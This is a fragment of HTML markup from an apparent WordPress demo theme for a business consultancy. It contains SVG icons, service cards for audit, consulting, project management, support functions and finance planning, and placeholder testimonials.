		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"class="link-details"> Learn More</a>
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
